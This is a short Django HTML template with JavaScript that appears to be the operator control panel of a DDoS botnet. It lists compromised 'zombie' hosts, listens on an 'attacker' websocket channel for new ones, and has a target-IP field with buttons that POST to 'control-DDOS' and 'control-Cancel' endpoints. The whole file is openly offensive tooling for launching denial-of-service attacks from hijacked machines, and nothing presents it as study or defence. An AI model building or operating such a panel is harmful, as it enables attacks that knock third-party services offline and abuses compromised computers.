<!doctype html>
<meta charset="UTF-8">



<html>


<head>


	<script type="text/javascript" src="{{ STATIC_URL }}js/ws4redis.js"></script>
	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>

<script>

$(function(){
	solo_socket = WS4Redis({
		uri:'{{WEBSOCKET_URI}}attacker?subscribe-session',
		receive_message:msghandler,
		heartbeat_msg: "--heartbeat--",
	});
});


function msghandler(json){

	if(json.hasOwnProperty('newZombie')){

		$('tr:first').append("<td>"+json['newZombie']);
	}
}



function ddos(){

	var targ = $("#target").val()
	$.ajax({
		url:"{% url 'control-DDOS'%}",
		type:'POST',
		dataType:"json",
		data:{'targetip':targ}
	});
}

function cancel(){
		$.ajax({
			url:"{% url 'control-Cancel'%}",
			type: 'POST',
			dataType: "json",
			data:{}
		});

}



</script>

</head>


<tr>
{%for zombie in zombies%}
	<td>{{zombie.host}}</td>
{%endfor%}
</tr>

<div>
<input id="target"/>
<button onclick="ddos();" text="DDOS"/>

<button onclick="cancel();",text="Cancel"/>
</div>


</html>
